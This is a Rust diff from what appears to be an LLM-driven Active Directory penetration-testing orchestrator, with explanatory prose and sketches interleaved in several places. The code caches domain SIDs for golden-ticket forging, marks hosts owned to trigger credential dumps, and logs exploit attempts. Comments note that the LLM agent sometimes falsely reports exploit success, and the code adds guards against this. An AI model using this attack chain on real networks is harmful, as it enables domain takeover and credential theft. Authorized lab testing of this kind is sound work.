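The flat-name resolution that follows can be approximated in a self-contained sketch, with plain collections standing in for `StateInner` (the map layout here is an assumption made for the example; the real code also consults `netbios_to_fqdn`):

```rust
use std::collections::HashMap;

/// Resolve a NetBIOS/flat domain name to a known FQDN: explicit trust
/// metadata first, then first-label comparison against known domains.
/// Returns None for unknown flat names, so callers skip caching.
fn resolve_flat_to_fqdn(
    flat: &str,
    trusted: &HashMap<String, String>, // flat_name (uppercase) -> domain FQDN
    domains: &[String],
) -> Option<String> {
    let target = flat.to_uppercase();
    if let Some(fqdn) = trusted.get(&target) {
        return Some(fqdn.to_lowercase());
    }
    // Last resort: compare the first label of each known domain FQDN.
    domains
        .iter()
        .find(|d| {
            d.split('.')
                .next()
                .map(|first| first.eq_ignore_ascii_case(flat))
                .unwrap_or(false)
        })
        .map(|d| d.to_lowercase())
}
```

The `None` path is the safety property: guessing a FQDN would risk attributing a SID to the wrong domain, as the comments in the diff explain.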
+fn resolve_flat_to_fqdn(flat: &str, state: &StateInner) -> Option<String> {
+    let target = flat.to_uppercase();
+
+    if let Some(t) = state
+        .trusted_domains
+        .values()
+        .find(|t| !t.flat_name.is_empty() && t.flat_name.to_uppercase() == target)
+    {
+        return Some(t.domain.to_lowercase());
+    }
+
+    if let Some(fqdn) = state
+        .netbios_to_fqdn
+        .get(&target)
+        .or_else(|| state.netbios_to_fqdn.get(flat))
+    {
+        // Only accept the mapping if it looks like a domain FQDN, not a host
+        // FQDN (e.g. "DC02" → "dc02.contoso.local" should NOT yield "dc02…").
+        let lower = fqdn.to_lowercase();
+        if is_valid_domain_fqdn(&lower) && state.domains.iter().any(|d| d.to_lowercase() == lower) {
+            return Some(lower);
+        }
+    }
+
+    state
+        .domains
+        .iter()
+        .find(|d| {
+            d.split('.')
+                .next()
+                .map(|first| first.eq_ignore_ascii_case(flat))
+                .unwrap_or(false)
+        })
+        .map(|d| d.to_lowercase())
+}
+
+/// Validate that a string looks like a domain FQDN.
+///
+/// Rejects empty strings, IP-like patterns, strings with whitespace, and strings
+/// without at least one dot. Used to filter out malformed domain values that
+/// occasionally appear in tool payloads (e.g. `"192.168.58.30 - dc01"`).
+fn is_valid_domain_fqdn(s: &str) -> bool {
+    if s.is_empty() || s.contains(' ') || s.contains(':') || s.contains('/') {
+        return false;
+    }
+    if !s.contains('.') {
+        return false;
+    }
+    let first_label = s.split('.').next().unwrap_or("");
+    if first_label.is_empty() || first_label.chars().all(|c| c.is_ascii_digit()) {
+        return false;
+    }
+    s.chars()
+        .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_')
+}
 
 /// Determine the domain admin path from a payload.
/// @@ -80,6 +150,12 @@ pub(crate) async fn check_domain_admin_indicators(payload: &Value, dispatcher: & info!("Domain Admin achieved!"); } if !already_da { + // Emit Domain Admin timeline event + let da_domain = { + let state = dispatcher.state.read().await; + state.domains.first().cloned().unwrap_or_default() + }; + create_domain_admin_timeline_event(dispatcher, &da_domain, path.as_deref()).await; let (domain, dc_target) = { let state = dispatcher.state.read().await; let domain = state.domains.first().cloned().unwrap_or_default(); @@ -183,6 +259,21 @@ pub(crate) async fn check_golden_ticket_completion( { warn!(err = %e, "Failed to set golden ticket flag"); } + + // Emit attack path timeline event for golden ticket + let techniques = vec!["T1558.001".to_string()]; + let event_id = format!("evt-gt-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "golden_ticket", + "description": format!("Golden ticket forged for domain {domain}"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; } pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: &Arc) { @@ -214,6 +305,17 @@ pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: pwned_host = ?pwned_ip, "Credential upgraded to admin -- dispatching priority secretsdump" ); + // Mark the host as owned so automations (lsassy_dump, etc.) 
can fire + if let Some(ref ip) = pwned_ip { + if let Err(e) = dispatcher + .state + .mark_host_owned(&dispatcher.queue, ip) + .await + { + warn!(err = %e, ip = %ip, "Failed to mark host as owned"); + } + } + create_admin_upgrade_timeline_event(dispatcher, &username, &domain).await; let work: Vec<(String, ares_core::models::Credential)> = { let state = dispatcher.state.read().await; let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); @@ -280,72 +382,124 @@ pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &A return; } let combined = text_parts.join("\n"); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&combined) { - let domain = payload - .get("domain") - .and_then(|v| v.as_str()) - .map(|d| d.to_lowercase()) - .filter(|d| !d.is_empty()); - let domain = match domain { - Some(d) => d, - None => { - let state = dispatcher.state.read().await; - match state.domains.first() { - Some(d) => d.to_lowercase(), - None => return, - } - } - }; - let already_cached = { + + // Only cache when the output is genuine LSARPC SID-discovery output — i.e. + // it has either the impacket-lookupsid `[*] Domain SID is: …` header or + // the rpcclient `lsaquery` `Domain Name / Domain Sid` pair. Arbitrary recon + // output (LDAP group enumeration, BloodHound dumps, etc.) routinely contains + // foreign-security-principal SIDs that *look* like domain SIDs but are + // actually `-` entries from a different forest. Caching a + // regex-truncated FSP SID against the task's payload domain misforges + // every downstream golden / inter-realm ticket — caused op-20260429-164553 + // to forge a TGT for sevenkingdoms.local with a bogus ExtraSid that the + // parent KDC rejected with rpc_s_access_denied. + // + // lsaquery is the primary unauth path for cross-forest target SID discovery + // — it routinely succeeds against null sessions where impacket-lookupsid + // gets STATUS_ACCESS_DENIED. 
op-20260429-181500 discovered essos's SID via + // lsaquery but failed to cache it (only lookupsid was wired up), so the + // subsequent forge_inter_realm_and_dump fired with has_target_sid=false + // and produced no krbtgt extraction. + let lookupsid_sid = ares_core::parsing::LOOKUPSID_HEADER_RE + .captures(&combined) + .and_then(|c| c.get(1).map(|m| m.as_str().to_string())); + let lsaquery_pair = ares_core::parsing::extract_lsaquery_domain_sid(&combined); + let (sid, lsaquery_flat) = match (lookupsid_sid, lsaquery_pair) { + (Some(s), _) => (s, None), + (None, Some((flat, s))) => (s, Some(flat)), + (None, None) => return, + }; + + // Resolve the FQDN this SID belongs to. Anchor preference order: + // 1. Flat name parsed from the output — authoritative when present. For + // impacket-lookupsid we get it from the RID lines (e.g. `500: ESSOS\…`); + // for rpcclient lsaquery we get it from `Domain Name: ESSOS`. + // 2. Payload's `domain` field — used only when output has no flat name AND + // the field is a valid FQDN. The payload's domain is the *task* target, + // not necessarily the domain that produced the SID; trusting it blindly + // misattributed essos.local's SID to north.sevenkingdoms.local in + // op-20260429-112418. + // 3. State's primary domain — last resort, only when nothing else applies. + let parsed_flat = lsaquery_flat.or_else(|| { + ares_core::parsing::extract_domain_sid_and_flat_name(&combined).map(|(flat, _)| flat) + }); + let domain = { + let state = dispatcher.state.read().await; + if let Some(flat) = parsed_flat.as_deref() { + resolve_flat_to_fqdn(flat, &state).or_else(|| { + // Flat name parsed but unmapped — refuse to cache. Caching + // against the payload's domain here is exactly the bug we + // are trying to avoid. + warn!( + flat_name = %flat, + sid = %sid, + "Skipping SID cache: flat name does not match any known domain" + ); + None + }) + } else { + // No flat name in output. Fall back to payload domain or primary. 
+ payload + .get("domain") + .and_then(|v| v.as_str()) + .map(|d| d.to_lowercase()) + .filter(|d| is_valid_domain_fqdn(d)) + .or_else(|| state.domains.first().map(|d| d.to_lowercase())) + } + }; + let domain = match domain { + Some(d) => d, + None => return, + }; + let already_cached = { + let state = dispatcher.state.read().await; + state + .domain_sids + .get(&domain) + .map(|s| s == &sid) + .unwrap_or(false) + }; + if !already_cached { + let op_id = { let state = dispatcher.state.read().await; - state + state.operation_id.clone() + }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { + warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + } else { + info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + dispatcher + .state + .write() + .await .domain_sids - .get(&domain) - .map(|s| s == &sid) - .unwrap_or(false) + .insert(domain.clone(), sid.clone()); + } + } + if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { + let already_known = { + let state = dispatcher.state.read().await; + state.admin_names.contains_key(&domain) }; - if !already_cached { + if !already_known { let op_id = { let state = dispatcher.state.read().await; state.operation_id.clone() }; let reader = ares_core::state::RedisStateReader::new(op_id); let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { - warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { + warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); } else { - info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); dispatcher .state 
.write() .await - .domain_sids - .insert(domain.clone(), sid); - } - } - if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { - let already_known = { - let state = dispatcher.state.read().await; - state.admin_names.contains_key(&domain) - }; - if !already_known { - let op_id = { - let state = dispatcher.state.read().await; - state.operation_id.clone() - }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { - warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); - } else { - info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); - dispatcher - .state - .write() - .await - .admin_names - .insert(domain, admin_name); - } + .admin_names + .insert(domain, admin_name); } } } @@ -354,8 +508,81 @@ pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &A #[cfg(test)] mod tests { use super::*; + use ares_core::models::TrustInfo; use serde_json::json; + fn make_trust(domain: &str, flat: &str) -> TrustInfo { + TrustInfo { + domain: domain.to_string(), + flat_name: flat.to_string(), + direction: "bidirectional".to_string(), + trust_type: "forest".to_string(), + sid_filtering: true, + } + } + + // -- resolve_flat_to_fqdn ----------------------------------------------- + + #[test] + fn resolve_flat_uses_trusted_domain_metadata() { + let mut state = StateInner::new("op-test".into()); + state.trusted_domains.insert( + "fabrikam.local".into(), + make_trust("fabrikam.local", "FABRIKAM"), + ); + assert_eq!( + resolve_flat_to_fqdn("FABRIKAM", &state).as_deref(), + Some("fabrikam.local") + ); + } + + #[test] + fn resolve_flat_falls_back_to_primary_domain_label() { + let mut state = StateInner::new("op-test".into()); + state.domains.push("contoso.local".into()); + assert_eq!( + resolve_flat_to_fqdn("CONTOSO", &state).as_deref(), + 
Some("contoso.local") + ); + } + + #[test] + fn resolve_flat_unknown_returns_none() { + let state = StateInner::new("op-test".into()); + assert_eq!(resolve_flat_to_fqdn("UNKNOWN", &state), None); + } + + #[test] + fn resolve_flat_does_not_match_host_short_name() { + // netbios_to_fqdn maps DC02 → dc02.contoso.local (a host, not domain). + // resolve_flat_to_fqdn must reject this — dc02.contoso.local is not in + // state.domains, so it cannot be a domain FQDN. + let mut state = StateInner::new("op-test".into()); + state.domains.push("contoso.local".into()); + state + .netbios_to_fqdn + .insert("DC02".into(), "dc02.contoso.local".into()); + assert_eq!(resolve_flat_to_fqdn("DC02", &state), None); + } + + #[test] + fn resolve_flat_prefers_trust_metadata_over_primary_label() { + // Both north.sevenkingdoms.local and sevenkingdoms.local are known. + // Flat "SEVENKINGDOMS" should resolve to the parent FQDN even when + // both could plausibly match by first-label heuristic. + let mut state = StateInner::new("op-test".into()); + state.domains.push("north.sevenkingdoms.local".into()); + state.domains.push("sevenkingdoms.local".into()); + state.trusted_domains.insert( + "sevenkingdoms.local".into(), + make_trust("sevenkingdoms.local", "SEVENKINGDOMS"), + ); + assert_eq!( + resolve_flat_to_fqdn("SEVENKINGDOMS", &state).as_deref(), + Some("sevenkingdoms.local") + ); + } + // -- resolve_da_path ---------------------------------------------------- #[test] diff --git a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs index 9dd932e6..69c2fbdd 100644 --- a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs +++ b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs @@ -145,7 +145,16 @@ async fn poll_discoveries(dispatcher: &Dispatcher) -> Result<()> { } "user" => { if let Ok(user) = serde_json::from_value::(data.clone()) { - if ["kerberos_enum", 
"netexec_user_enum"].contains(&user.source.as_str()) { + if [ + "kerberos_enum", + "netexec_user_enum", + "ldap_group_enumeration", + "acl_discovery", + "foreign_group_enumeration", + "ldap_enumeration", + ] + .contains(&user.source.as_str()) + { let _ = dispatcher.state.publish_user(&dispatcher.queue, user).await; } } diff --git a/ares-cli/src/orchestrator/result_processing/mod.rs b/ares-cli/src/orchestrator/result_processing/mod.rs index 730a9815..6a7bac63 100644 --- a/ares-cli/src/orchestrator/result_processing/mod.rs +++ b/ares-cli/src/orchestrator/result_processing/mod.rs @@ -34,7 +34,10 @@ use self::admin_checks::{ }; use self::discovery_polling::has_lockout_in_result; use self::parsing::{parse_discoveries, resolve_parent_id}; -use self::timeline::{create_credential_timeline_event, create_hash_timeline_event}; +use self::timeline::{ + create_credential_timeline_event, create_exploitation_timeline_event, + create_hash_timeline_event, create_lateral_movement_timeline_event, +}; /// Kerberos/SMB errors that indicate a credential is locked out. pub(crate) const LOCKOUT_PATTERNS: &[&str] = @@ -50,7 +53,7 @@ pub async fn process_completed_task( let result = &completed.result; // Extract task-level metadata from pending_tasks before complete_task removes it. - let (cred_key, task_domain) = { + let (cred_key, task_domain, task_target_ip) = { let state = dispatcher.state.read().await; let task = state.pending_tasks.get(task_id.as_str()); let ck = task @@ -61,7 +64,11 @@ pub async fn process_completed_task( .and_then(|t| t.params.get("domain")) .and_then(|v| v.as_str()) .map(|s| s.to_string()); - (ck, td) + let tip = task + .and_then(|t| t.params.get("target_ip")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()); + (ck, td, tip) }; { @@ -115,11 +122,37 @@ pub async fn process_completed_task( let default_domain = if let Some(ref td) = task_domain { td.clone() } else { - get_default_domain(dispatcher).await + // Resolve domain from the task's target IP (e.g. 
secretsdump against a + // specific DC). Falls back to state.domains.first() only as last resort. + resolve_domain_from_ip(dispatcher, task_target_ip.as_deref()).await }; extract_from_raw_text(payload, dispatcher, &default_domain).await; } + // Mark host as owned when a credential_access task succeeds AND parser + // evidence proves credentials/hashes were extracted. The LLM's + // `task_complete(success=true)` is not sufficient on its own — without + // parser-grounded credential evidence we treat the claim as unverified + // and skip the state write. + if result.success { + if let Some(ref ip) = task_target_ip { + if task_id.starts_with("credential_access_") + && result_has_credential_evidence(&result.result) + { + let _ = dispatcher + .state + .mark_host_owned(&dispatcher.queue, ip) + .await; + } else if task_id.starts_with("credential_access_") { + debug!( + task_id = %task_id, + ip = %ip, + "Skipping mark_host_owned: no parser-extracted credential/hash evidence" + ); + } + } + } + // Domain SID extraction: scan raw text for S-1-5-21-... patterns (from secretsdump). // Caches the SID for golden ticket generation without needing lookupsid. 
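The anchoring idea behind the SID-caching guard (trust the impacket-lookupsid banner, not any bare `S-1-5-21-…` substring) can be shown with a prefix-based, std-only stand-in for the `LOOKUPSID_HEADER_RE` regex named in the diff:

```rust
/// Accept a SID only when it appears in the impacket-lookupsid header line
/// `[*] Domain SID is: S-1-5-21-…`. Bare S-1-5-21 substrings elsewhere may
/// be foreign-security-principal SIDs from another forest and must not be
/// cached. Simplified stand-in for the real regex-based parser.
fn lookupsid_header_sid(output: &str) -> Option<String> {
    const HEADER: &str = "[*] Domain SID is: ";
    for line in output.lines() {
        if let Some(rest) = line.trim().strip_prefix(HEADER) {
            let sid = rest.trim();
            if sid.starts_with("S-1-5-21-") {
                return Some(sid.to_string());
            }
        }
    }
    None
}
```

A BloodHound or LDAP dump containing `member: S-1-5-21-…` lines yields `None` here, which is exactly the "refuse to cache" behavior the comments above motivate.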
if let Some(ref payload) = result.result { @@ -140,27 +173,61 @@ pub async fn process_completed_task( } } - if result.success { - if let Some(vuln_id) = completed - .task_id - .starts_with("exploit_") - .then(|| { - result - .result - .as_ref() - .and_then(|r| r.get("vuln_id")) - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }) - .flatten() + // Handle exploit task outcomes — create timeline events for both success and failure + if completed.task_id.starts_with("exploit_") { + if let Some(vuln_id) = result + .result + .as_ref() + .and_then(|r| r.get("vuln_id")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) { - info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); - if let Err(e) = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await - { - warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + // Guard: LLM may call task_complete (success=true) with a result + // that actually describes a failure. Don't mark as exploited if the + // result summary contains clear failure indicators OR if no parser + // evidence (discoveries from real tool stdout) corroborates the + // exploit. The text heuristic catches obvious lies; the parser + // check catches silent fabrication. + let actually_succeeded = result.success + && !result_text_indicates_failure(&result.result) + && result_has_parser_evidence(&result.result); + + if actually_succeeded { + info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); + if let Err(e) = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await + { + warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + } + create_exploitation_timeline_event(dispatcher, &vuln_id, task_id).await; + } else { + // Record failed exploit attempts as timeline events so they appear + // in reports (e.g. noPac patched, PrintNightmare patched, Certifried + // tool missing). 
This closes the "dispatched but no report evidence" gap. + let err_msg = result.error.as_deref().unwrap_or("unknown error"); + let event_id = format!( + "evt-exploit-fail-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "exploit_failed", + "description": format!("Exploit attempted but failed: {vuln_id} — {err_msg}"), + "mitre_techniques": ["T1210"], + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &["T1210".to_string()]) + .await; + info!( + vuln_id = %vuln_id, + task_id = %task_id, + err = err_msg, + "Exploit failure recorded as timeline event" + ); } } } @@ -188,9 +255,113 @@ pub async fn process_completed_task( let _ = dispatcher.notify_state_update().await; } -/// Get the default domain from state (first domain, or empty string). -async fn get_default_domain(dispatcher: &Arc) -> String { +/// Return true if the task result carries any parser-extracted discoveries. +/// "Parser-extracted" means populated by ares-tools parsers running on real +/// tool stdout — never LLM-fabricated. Used to ground state writes (e.g. +/// `mark_exploited`) against actual evidence. +fn result_has_parser_evidence(result: &Option) -> bool { + let Some(payload) = result.as_ref() else { + return false; + }; + let Some(disc) = payload.get("discoveries") else { + return false; + }; + const KEYS: &[&str] = &[ + "credentials", + "hashes", + "hosts", + "shares", + "vulnerabilities", + "delegations", + "trusts", + "users", + "spns", + ]; + KEYS.iter().any(|k| { + disc.get(*k) + .and_then(|v| v.as_array()) + .map(|a| !a.is_empty()) + .unwrap_or(false) + }) +} + +/// Return true if the task produced parser-extracted credential or hash +/// evidence — the grounding signal for `mark_host_owned` on +/// `credential_access_*` tasks. 
+fn result_has_credential_evidence(result: &Option<Value>) -> bool {
+    let Some(payload) = result.as_ref() else {
+        return false;
+    };
+    let Some(disc) = payload.get("discoveries") else {
+        return false;
+    };
+    ["credentials", "hashes"].iter().any(|k| {
+        disc.get(*k)
+            .and_then(|v| v.as_array())
+            .map(|a| !a.is_empty())
+            .unwrap_or(false)
+    })
+}
+
+/// Check whether a task result's text indicates the LLM reported a failure,
+/// even though the task technically completed (task_complete was called).
+fn result_text_indicates_failure(result: &Option<Value>) -> bool {
+    let text = match result {
+        Some(v) => {
+            // Check both "summary" field and full JSON string
+            let summary = v.get("summary").and_then(|s| s.as_str()).unwrap_or("");
+            if !summary.is_empty() {
+                summary.to_string()
+            } else {
+                v.to_string()
+            }
+        }
+        None => return false,
+    };
+    let lower = text.to_lowercase();
+    lower.starts_with("failed")
+        || lower.contains("\"failed:")
+        || lower.contains("\"failed ")
+        || lower.contains("failed to exploit")
+        || lower.contains("failed esc")
+        || lower.contains("missing required")
+        || lower.contains("missing ca")
+        || lower.contains("without ca name")
+        || lower.contains("cannot attempt")
+        || lower.contains("cannot execute")
+        || lower.contains("not available in")
+        || lower.contains("ept_s_not_registered")
+        || lower.contains("blocked:")
+        || lower.contains("invalidcredentials")
+        || lower.contains("status_account_locked")
+        || lower.contains("rpc_s_access_denied")
+}
+
+/// Resolve the domain for hash/credential attribution from the task's target IP.
+///
+/// Priority:
+/// 1. Match target_ip to a known host's domain (hostname suffix → domain)
+/// 2. Match target_ip to a domain controller entry
+/// 3.
Fall back to state.domains.first() +async fn resolve_domain_from_ip(dispatcher: &Arc, target_ip: Option<&str>) -> String { let state = dispatcher.state.read().await; + if let Some(ip) = target_ip { + // Check domain_controllers map first — most reliable + for (domain, dc_ip) in &state.domain_controllers { + if dc_ip == ip { + return domain.clone(); + } + } + // Derive domain from FQDN hostname (e.g. dc01.child.contoso.local + // → child.contoso.local) + for host in &state.hosts { + if host.ip == ip { + if let Some(dot) = host.hostname.find('.') { + return host.hostname[dot + 1..].to_string(); + } + } + } + } state.domains.first().cloned().unwrap_or_default() } @@ -326,6 +497,7 @@ async fn auto_chain_s4u_secretsdump(payload: &Value, dispatcher: &Arc {} Err(e) => warn!(err = %e, "S4U auto-chain: failed to dispatch secretsdump"), @@ -389,9 +561,11 @@ async fn extract_from_raw_text( for cred in extracted.credentials { let is_cracked = cred.source.starts_with("cracked:"); - let cracked_username = cred.username.clone(); - let cracked_domain = cred.domain.clone(); - let cracked_password = cred.password.clone(); + let source = cred.source.clone(); + let username = cred.username.clone(); + let domain = cred.domain.clone(); + let password = cred.password.clone(); + let is_admin = cred.is_admin; match dispatcher .state .publish_credential(&dispatcher.queue, cred) @@ -399,6 +573,8 @@ async fn extract_from_raw_text( { Ok(true) => { new_count += 1; + create_credential_timeline_event(dispatcher, &source, &username, &domain, is_admin) + .await; // When a cracked credential is published, update the corresponding // hash's cracked_password field in state and Redis. 
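The three-tier IP-to-domain attribution just shown can be restated as a self-contained sketch, with plain collections replacing the dispatcher state (parameter shapes here are assumptions for the example):

```rust
use std::collections::HashMap;

/// Attribute a domain to a target IP: DC map first (most reliable), then the
/// suffix of a known host FQDN, then the primary domain as a last resort.
fn resolve_domain_from_ip(
    target_ip: Option<&str>,
    domain_controllers: &HashMap<String, String>, // domain -> DC IP
    hosts: &[(String, String)],                   // (ip, hostname FQDN)
    domains: &[String],
) -> String {
    if let Some(ip) = target_ip {
        for (domain, dc_ip) in domain_controllers {
            if dc_ip == ip {
                return domain.clone();
            }
        }
        // Derive domain from a host FQDN, e.g. dc01.child.contoso.local
        // -> child.contoso.local
        for (host_ip, hostname) in hosts {
            if host_ip == ip {
                if let Some(dot) = hostname.find('.') {
                    return hostname[dot + 1..].to_string();
                }
            }
        }
    }
    domains.first().cloned().unwrap_or_default()
}
```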
                 if is_cracked {
@@ -406,9 +582,9 @@ async fn extract_from_raw_text(
                         .state
                         .update_hash_cracked_password(
                             &dispatcher.queue,
-                            &cracked_username,
-                            &cracked_domain,
-                            &cracked_password,
+                            &username,
+                            &domain,
+                            &password,
                         )
                         .await;
                 }
@@ -419,8 +595,24 @@ async fn extract_from_raw_text(
     }
     for hash in extracted.hashes {
+        let username = hash.username.clone();
+        let domain = hash.domain.clone();
+        let hash_type = hash.hash_type.clone();
+        let hash_value = hash.hash_value.clone();
+        let source = hash.source.clone();
         match dispatcher.state.publish_hash(&dispatcher.queue, hash).await {
-            Ok(true) => new_count += 1,
+            Ok(true) => {
+                new_count += 1;
+                create_hash_timeline_event(
+                    dispatcher,
+                    &username,
+                    &domain,
+                    &hash_type,
+                    &hash_value,
+                    &source,
+                )
+                .await;
+            }
             Ok(false) => {}
             Err(e) => warn!(err = %e, "Failed to publish text-extracted hash"),
         }
diff --git a/ares-cli/src/orchestrator/result_processing/parsing.rs b/ares-cli/src/orchestrator/result_processing/parsing.rs
index 8a0d1c1b..27dc43d4 100644
--- a/ares-cli/src/orchestrator/result_processing/parsing.rs
+++ b/ares-cli/src/orchestrator/result_processing/parsing.rs
@@ -107,7 +107,14 @@ pub(crate) fn parse_discoveries(payload: &Value) -> ParsedDiscoveries {
         }
     }
     // Users -- defense-in-depth: only accept entries with a parser-verified source.
-    const TRUSTED_USER_SOURCES: &[&str] = &["kerberos_enum", "netexec_user_enum"];
+    const TRUSTED_USER_SOURCES: &[&str] = &[
+        "kerberos_enum",
+        "netexec_user_enum",
+        "ldap_group_enumeration",
+        "acl_discovery",
+        "foreign_group_enumeration",
+        "ldap_enumeration",
+    ];
     if let Some(users) = payload.get("discovered_users").and_then(|v| v.as_array()) {
         for user_val in users {
             if let Ok(user) = serde_json::from_value::(user_val.clone()) {
diff --git a/ares-cli/src/orchestrator/result_processing/tests.rs b/ares-cli/src/orchestrator/result_processing/tests.rs
index 42e46699..25e8ac21 100644
--- a/ares-cli/src/orchestrator/result_processing/tests.rs
+++ b/ares-cli/src/orchestrator/result_processing/tests.rs
@@ -3,9 +3,84 @@ use super::admin_checks::{
 };
 use super::parsing::{has_domain_admin_indicator, parse_discoveries, resolve_parent_id};
 use super::timeline::{credential_techniques, hash_techniques, is_critical_hash};
+use super::{result_has_credential_evidence, result_has_parser_evidence};
 use ares_core::models::{Credential, Hash};
 use serde_json::json;
 
+#[test]
+fn parser_evidence_requires_discoveries_key() {
+    // No payload at all → no evidence
+    assert!(!result_has_parser_evidence(&None));
+    // Payload without discoveries → no evidence
+    assert!(!result_has_parser_evidence(&Some(json!({"summary": "ok"}))));
+    // Empty discoveries object → no evidence
+    assert!(!result_has_parser_evidence(&Some(
+        json!({"discoveries": {}})
+    )));
+    // Empty arrays → no evidence
+    assert!(!result_has_parser_evidence(&Some(
+        json!({"discoveries": {"credentials": [], "hashes": []}})
+    )));
+}
+
+#[test]
+fn parser_evidence_accepts_any_populated_array() {
+    for key in [
+        "credentials",
+        "hashes",
+        "hosts",
+        "shares",
+        "vulnerabilities",
+        "delegations",
+        "trusts",
+        "users",
+        "spns",
+    ] {
+        let payload = json!({"discoveries": {key: [{"placeholder": true}]}});
+        assert!(
+            result_has_parser_evidence(&Some(payload)),
+            "key {key} should count as parser evidence"
+        );
+    }
+}
+
+#[test]
+fn credential_evidence_only_credentials_or_hashes() {
+    // Only hosts → not credential evidence
+    assert!(!result_has_credential_evidence(&Some(
+        json!({"discoveries": {"hosts": [{"ip": "192.168.58.10"}]}})
+    )));
+    // Credentials present → credential evidence
+    assert!(result_has_credential_evidence(&Some(
+        json!({"discoveries": {"credentials": [{"username": "admin"}]}})
+    )));
+    // Hashes present → credential evidence
+    assert!(result_has_credential_evidence(&Some(
+        json!({"discoveries": {"hashes": [{"username": "admin"}]}})
+    )));
+    // Vulnerabilities alone are NOT credential evidence (would be parser evidence)
+    assert!(!result_has_credential_evidence(&Some(
+        json!({"discoveries": {"vulnerabilities": [{"vuln_id": "v1"}]}})
+    )));
+}
+
+#[test]
+fn llm_findings_field_is_not_treated_as_evidence() {
+    // LLM-fabricated findings live under `llm_findings`, never `discoveries`.
+    // The grounding check must IGNORE them.
+    let payload = json!({
+        "summary": "claimed exploit success",
+        "llm_findings": [{
+            "vulnerabilities": [{
+                "vuln_id": "finding_kerberoastable_account_192_168_58_10",
+                "vuln_type": "kerberoastable_account",
+            }]
+        }]
+    });
+    assert!(!result_has_parser_evidence(&Some(payload.clone())));
+    assert!(!result_has_credential_evidence(&Some(payload)));
+}
+
 #[test]
 fn parse_credentials_array() {
     let payload = json!({
@@ -669,6 +744,8 @@ fn parse_shares_with_comment() {
     assert_eq!(parsed.shares[0].comment, "Logon server share");
 }
 
+// --- parse_pwned_line tests ---
+
 #[test]
 fn pwned_line_standard_format() {
     let line = "[+] CONTOSO\\admin:P@ssw0rd! (Pwn3d!)";
@@ -745,6 +822,8 @@ fn pwned_line_username_with_special_chars() {
     );
 }
 
+// --- extract_ip_from_line tests ---
+
 #[test]
 fn extract_ip_basic() {
     let line = "SMB 192.168.58.10 445 DC01 [+] CONTOSO\\admin (Pwn3d!)";
@@ -789,6 +868,8 @@ fn extract_ip_boundary_values() {
     assert_eq!(extract_ip_from_line(line), Some("0.0.0.0".to_string()));
 }
 
+// --- has_golden_ticket_indicator tests ---
+
 #[test]
 fn golden_ticket_indicator_present() {
     let text = "Saving ticket in administrator.ccache";
@@ -818,6 +899,8 @@ fn golden_ticket_indicator_both_present_not_adjacent() {
     assert!(has_golden_ticket_indicator(text));
 }
 
+// --- resolve_da_path tests ---
+
 #[test]
 fn da_path_explicit_flag_with_path() {
     let payload = json!({
@@ -863,6 +946,8 @@ fn da_path_null_flag_defaults_to_krbtgt() {
     );
 }
 
+// --- credential_techniques tests ---
+
 #[test]
 fn credential_techniques_admin_base() {
     let t = credential_techniques("manual", true);
@@ -920,6 +1005,8 @@ fn credential_techniques_empty_source() {
     assert_eq!(t, vec!["T1552"]);
 }
 
+// --- hash_techniques tests ---
+
 #[test]
 fn hash_techniques_base() {
     let t = hash_techniques("aabbccdd", "ntlm", "manual");
@@ -1005,6 +1092,8 @@ fn hash_techniques_as_rep_hyphenated_source() {
     assert!(t.contains(&"T1558.004".to_string()));
 }
 
+// --- is_critical_hash tests ---
+
 #[test]
 fn critical_hash_krbtgt() {
     assert!(is_critical_hash("krbtgt"));
diff --git a/ares-cli/src/orchestrator/result_processing/timeline.rs b/ares-cli/src/orchestrator/result_processing/timeline.rs
index 6231da75..843bc370 100644
--- a/ares-cli/src/orchestrator/result_processing/timeline.rs
